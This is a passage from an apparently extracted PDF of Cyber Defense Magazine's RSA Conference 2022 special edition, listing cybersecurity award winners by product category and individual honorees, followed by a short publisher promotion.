SecurityScorecard Most Comprehensive Risk Management

Tanium Market Leader Risk Management

ThreatConnect, Inc Editor's Choice Risk Management

Vulcan Cyber Next Gen Risk Management

CyberSaint Security Most Comprehensive Risk Management

Risk-based Vulnerability Management (RBVM)

Proficio Most Comprehensive Risk-based Vulnerability Management (RBVM)

Cydome Security Publisher's Choice Risk-based Vulnerability Management (RBVM)

Skybox Security Market Leader Risk-based Vulnerability Management (RBVM)

RiskRecon, a Mastercard Company Most Innovative Risk-based Vulnerability

Management (RBVM)

SaaS Security

BetterCloud Cutting Edge SaaS Security

274

SaaS/Cloud Security

Anitian Most Comprehensive SaaS/Cloud Security

AppOmni Publisher's Choice SaaS/Cloud Security

Authomize Market Leader SaaS/Cloud Security

Banyan Security Most Innovative SaaS/Cloud Security

Beijing ThreatBook Technology Co., Ltd. Cutting Edge SaaS/Cloud Security

Canonic Security Editor's Choice SaaS/Cloud Security

Ericom Software Next Gen SaaS/Cloud Security

Grip Security Hot Company SaaS/Cloud Security

Iboss Best Product SaaS/Cloud Security

JupiterOne Best Solution SaaS/Cloud Security

Spin Technology Next-gen SaaS/Cloud Security

Suridata Next Gen SaaS/Cloud Security

Wing Security Hot Company SaaS/Cloud Security

Adaptive Shield Next Gen SaaS/Cloud Security

Valence Security Hot Company SaaS/Cloud Security

Secrets Management

Keeper Security Hot Company Secrets Management

1Password Hot Company Secrets Management

Secure Coding: Developer Upskilling

HackEDU Cutting Edge Secure Coding: Developer Upskilling

275

Secure Communications

Quantum Xchange Next Gen Secure Communications

Secure Low Code/No Code Process Automation

Coviant Next Gen Secure Low Code/No Code Process Automation

Secure Managed File Transfer

Coviant Hot Company Secure Managed File Transfer

Secure SaaS Backups

Spin Technology Most Innovative Secure SaaS Backups

Security Awareness Training

CybeReady Hot Company Security Awareness Training

Infosec Institute Publisher's Choice Security Awareness Training

KnowBe4 Market Leader Security Awareness Training

Living Security Most Innovative Security Awareness Training

Security Mentor, Inc. Cutting Edge Security Awareness Training

Mimecast Most Comprehensive Security Awareness Training

Global Learning Systems Editor's Choice Security Awareness Training

276

Security Company of the Year

HUMAN Security, Inc. Hot Company Security Company of the Year

Anitian Hot Company Security Company of the Year

Cyble Publisher's Choice Security Company of the Year

Mandiant Market Leader Security Company of the Year

Noname Security Most Innovative Security Company of the Year

Raytheon Intelligence & Space Cutting Edge Security Company of the Year

ReliaQuest Editor's Choice Security Company of the Year

RevBits LLC Next Gen Security Company of the Year

Sangfor Technologies Inc. Hot Company Security Company of the Year

Sectigo Limited Editor's Choice Security Company of the Year

WatchGuard Technologies Most Comprehensive Security Company of the Year

Security Essentials

Microsoft Best Product Security Essentials

Security Information Event Management (SIEM)

ConnectWise Most Comprehensive Security Information Event Management (SIEM)

Gurucul Publisher's Choice Security Information Event Management (SIEM)

ManageEngine, a division of Zoho Corporation Market Leader Security Information

Event Management (SIEM)

Panther Most Innovative Security Information Event Management (SIEM)

Seceon Cutting Edge Security Information Event Management (SIEM)

SECUINFRA GmbH Editor's Choice Security Information Event Management (SIEM)

277

Security Investigation Platform

Endace Next Gen Security Investigation Platform

ThreatQuotient Hot Company Security Investigation Platform

Security Orchestration Automation & Response (SOAR)

Sumo Logic Best Product Security Orchestration Automation & Response (SOAR)

ManageEngine, a division of Zoho Corporation Publisher's Choice Security

Orchestration, Automation & Response (SOAR)

Torq Cutting Edge Security Orchestration, Automation & Response (SOAR)

Siemplify Market Leader Security Orchestration, Automation & Response (SOAR)

SIRP Labs Editor's Choice Security Orchestration, Automation & Response (SOAR)

Security Project of the Year

UncommonX Most Innovative Security Project of the Year

DXC Technology Hot Company Security Project of the Year

Security Ratings

FortifyData Hot Company Security Ratings

Security Software

Cyolo Publisher's Choice Security Software

ThreatConnect, Inc Market Leader Security Software

278

Security Team of the Year

BreachQuest Next Gen Security Team of the Year

ConnectWise Most Comprehensive Security Team of the Year

Thrive Most Innovative Security Team of the Year

Zoom Video Communications, Inc. Cutting Edge Security Team of the Year

Bank of America Hot Company Security Team of the Year

Security Training

ITProTV, an ACI Learning Company Next Gen Security Training

Self-Protecting Data Security

KeyAvi Unique Self-Protecting Data Security

Xmirror Security Hot Company Self-Protecting Data Security

279

SMB Cybersecurity

A-LIGN Hot Company SMB Cybersecurity

Allot Publisher's Choice SMB Cybersecurity

Coro Market Leader SMB Cybersecurity

CYREBRO Most Innovative SMB Cybersecurity

Defendify Cutting Edge SMB Cybersecurity

JumpCloud Editor's Choice SMB Cybersecurity

Netsurion Next Gen SMB Cybersecurity

Zix Hot Company SMB Cybersecurity

WatchGuard Technologies Most Comprehensive SMB Cybersecurity

SMB MSSP

UncommonX Cutting Edge SMB MSSP

SOC-as-a-Service

ArmorPoint Next Gen SOC-as-a-Service

Milton Security, Inc. Market Leader SOC-as-a-Service

Tata Communications Publisher's Choice SOC-as-a-Service

Netsurion Hot Company SOC-as-a-Service

Software Composition Analysis

Rezilion, Inc. Cutting Edge Software Composition Analysis

280

Software Development Lifecycle Security

Rezilion, Inc. Hot Company Software Development Lifecycle Security

Contrast Security Market Leader Software Development Lifecycle Security

Cycode Most Innovative Software Development Lifecycle Security

Wabbi Publisher's Choice Software Development Lifecycle Security

Software Supply Chain Security

aDolus Technology Inc. Most Innovative Software Supply Chain Security

Cycode Cutting Edge Software Supply Chain Security

GrammaTech Editor's Choice Software Supply Chain Security

Xmirror Security Next Gen Software Supply Chain Security

Startup of the Year

Ridge Security Technology Most Innovative Startup of the Year

Storage and Archiving

Intel Corporation Market Leader Storage and Archiving

Supply Chain Risk

Advanced Onion, Inc. Cutting Edge Supply Chain Risk

281

Telecom Fraud Protection

AB Handshake Next Gen Telecom Fraud Protection

Telecom Network Security

Allot Cutting Edge Telecom Network Security

Third Party Cyber Risk Management (TPCRM)

Panorays Next Gen Third Party Cyber Risk Management (TPCRM)

SBER Market Leader Third Party Cyber Risk Management (TPCRM)

Astrix Security Editor's Choice Third Party Cyber Risk Management (TPCRM)

CyberGRX Hot Company Third Party Cyber Risk Management (TPCRM)

Third Party Risk Management (TPRM)

Cyble Next Gen Third Party Risk Management (TPRM)

HITRUST Services Corp. Hot Company Third Party Risk Management (TPRM)

Resecurity, Inc. Editor's Choice Third Party Risk Management (TPRM)

282

Threat Detection, Incident Response, Hunting and Triage

Platform

Anvilogic Most Innovative Threat Detection, Incident Response, Hunting and Triage

Platform

Threat Hunting

Deloitte Publisher's Choice Threat Hunting

Threat Intelligence

Anomali Most Comprehensive Threat Intelligence

Beijing ThreatBook Technology Co., Ltd. Publisher's Choice Threat Intelligence

Cognyte Market Leader Threat Intelligence

Cyberint Most Innovative Threat Intelligence

Cybersixgill Cutting Edge Threat Intelligence

Cyble Editor's Choice Threat Intelligence

Cyware Next Gen Threat Intelligence

Deloitte Hot Company Threat Intelligence

Intezer Best Product Threat Intelligence

Nisos Next Gen Threat Intelligence

Orange Cyberdefense Market Leader Threat Intelligence

Silobreaker Editor's Choice Threat Intelligence

ThreatQuotient Publisher's Choice Threat Intelligence

Cobwebs Technologies Ltd. Next Gen Threat Intelligence

BrightCloud Best Solution Threat Intelligence

Microsoft Most Comprehensive Threat Intelligence

283

Threat Modeling

OptimEyes.ai Next Gen Threat Modeling

StrikeReady Hot Company Threat Modeling

ThreatModeler Software Inc. Best Product Threat Modeling

ThreatModeler Software Inc. Publisher's Choice Threat Modeling

Unified Threat Management (UTM)

Deloitte Publisher's Choice Unified Threat Management (UTM)

Arista Networks Market Leader Unified Threat Management (UTM)

BitNinja Security Cutting Edge Unified Threat Management (UTM)

Unlimited Encrypted Data Sharing

Clarabot Zrt. Hot Company Unlimited Encrypted Data Sharing

User Behavior Analytics (UBA)

ManageEngine, a division of Zoho Corporation Next Gen User Behavior Analytics

(UBA)

Virtual Directory Services

Optimal IdM Cutting Edge Virtual Directory Services

284

VPN

Infiot Inc. Most Innovative VPN

MacPaw Hot Company VPN

Neustar Security Services Next Gen VPN

Vulnerability Assessment, Remediation and Management

Attivo Networks Cutting Edge Vulnerability Assessment, Remediation and

Management

Skybox Security Editor's Choice Vulnerability Assessment, Remediation and

Management

Thrive Hot Company Vulnerability Assessment, Remediation and Management

Bosch AIShield Publisher's Choice Vulnerability Assessment, Remediation and

Management

CYE Market Leader Vulnerability Assessment, Remediation and Management

Vulnerability Intelligence

SBER Most Innovative Vulnerability Intelligence

Silobreaker Cutting Edge Vulnerability Intelligence

Vulnerability Management

Difenda Editor's Choice Vulnerability Management

Rezilion, Inc. Next Gen Vulnerability Management

285

Web Application Security

OPSWAT Best Solution Web Application Security

Reblaze Best Product Web Application Security

Source Defense Next Gen Web Application Security

ThreatX Most Innovative Web Application Security

Cloudbric Editor's Choice Web Application Security

Neustar Security Services Publisher's Choice Web Application Security

Web Security

Red Access Publisher's Choice Web Security

Zero Trust

Absolute Software Market Leader Zero Trust

Axis Security Most Innovative Zero Trust

Banyan Security Cutting Edge Zero Trust

BedRock Systems Inc. Editor's Choice Zero Trust

Cyolo Next Gen Zero Trust

Ericom Software Hot Company Zero Trust

Forescout Technologies, Inc. Most Comprehensive Zero Trust

Illumio Publisher's Choice Zero Trust

INTRUSION Next Gen Zero Trust

Skyhigh Security Most Comprehensive Zero Trust

Netskope Publisher's Choice Zero Trust

Pathlock Market Leader Zero Trust

Remediant Most Innovative Zero Trust

RevBits LLC Cutting Edge Zero Trust

Cloudbric Next Gen Zero Trust

Keeper Security Next Gen Zero Trust

286

Zero Trust Application Protection

Anitian Editor's Choice Zero Trust Application Protection

BedRock Systems Inc. Next Gen Zero Trust Application Protection

Titaniam Inc. Hot Company Zero Trust Application Protection

TrueFort Best Product Zero Trust Application Protection

Zero Trust for Hybrid Enterprise

ColorTokens Best Solution Zero Trust for Hybrid Enterprise

Zero Trust Security

ColorTokens Publisher's Choice Zero Trust Security

287

Application Security Posture Management Expert

Pankaj Moolrajani Editor's Choice Delta Dental of California

CEO of the Year

Darren Guccione Editor's Choice Keeper Security

Stu Sjouwerman Publisher's Choice KnowBe4

Vijay Balasubramaniyan Cutting Edge Pindrop

Brian Murphy Next Gen ReliaQuest

Rob Davis Most Innovative CriticalStart

Erkang Zheng Next Gen JupiterOne

Chief Information Officer of the Year

Sean Thurston Editor's Choice KeyAvi

Chief Information Security Officer of the Year

John Hammes Next Gen Intelligent Waves LLC

T.J. Minichillo Editor's Choice KeyAvi

Bret Arsenault Publisher's Choice Microsoft

Craig Froelich Most Innovative Bank of America

Chief Product Officer of the Year - Cybersecurity Startup

Shai Guday Publisher's Choice Chief Product Officer of the Year - Cybersecurity

Startup

288

CTO of the Year

Tony Cole Cutting Edge Attivo Networks

Craig Lurey Editor's Choice Keeper Security

Continuous Improvement and Optimization Expert of the Year

Cesar Pie Editor's Choice CSIOS Corporation

CyberSecurity and Resiliency Risk Researcher

Dr. Anil Lamba Relentless CyberSecurity and Resiliency Risk Researcher

Microservices Security Expert

Pankaj Moolrajani Editor's Choice Delta Dental of California

Mobile Endpoint Security

Kathleen McGill Editor's Choice Trusted Computing Group

Privacy Expert of the Year

Stephen Cavey Publisher's Choice Ground Labs

Product Security Expert

Pankaj Moolrajani Editor's Choice Keep Truckin

289

Professional Cybersecurity Services of the Year

Sean Thurston Cutting Edge KeyAvi

Security Expert of the Year

Laurent Celerier Publisher's Choice Orange Cyberdefense

Joe Slowik Publisher's Choice Gigamon

Threat Intelligence

Brett Paradis Cutting Edge KeyAvi

Top Women in Cybersecurity

Alina Ribeiro Orange Cyberdefense

Amy Nelson Trusted Computing Group

Brittany Greenfield Wabbi

Bobbi Turner ConnectWise

Céline Gravelines KeyAvi

Carolyn Crandall Attivo Networks

Dr. Marie White Security Mentor, Inc.

Emilyann Fogarty Datto

Inbar Ries, CPO CYE

Julie Giannini Egnyte

Jen Stone SecurityMetrics

Michelle Welch WatchGuard Technologies

Simone Petrella Cybervista

Sarah Ashburn Attivo Networks

Women in Cybersecurity Scholarship

Veronika Jack Winner ACL/SBHS

290

Books by our Publisher: https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-

ebook/dp/B07KPNS9NH (with others coming soon...)

10 Years in The Making…

Thank You to our Loyal Subscribers!

We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know What You Think. It's mobile

and tablet friendly and superfast. We hope you like it. In addition, we're past the five nines of 7x24x365

uptime as we continue to scale with improved Web App Firewalls, Content Deliver Networks (CDNs)

around the Globe, Faster and More Secure DNS and CyberDefenseMagazine.com up and running as an

array of live mirror sites and our new B2C consumer magazine CyberSecurityMagazine.com. Millions of

monthly readers and new platforms coming…starting with www.cyberdefenseconferences.com this

month…

291

292

293

294

295

1 views·295 pages

CYBER DEFENSE MAGAZINE - RSA CONFERENCE 2022-SPECIAL EDITION PDF Free Download

CYBER DEFENSE MAGAZINE - RSA CONFERENCE 2022-SPECIAL EDITION PDF free Download. Think more deeply and widely.

Uploaded by its_timothy on 2/3/2026

/295

100%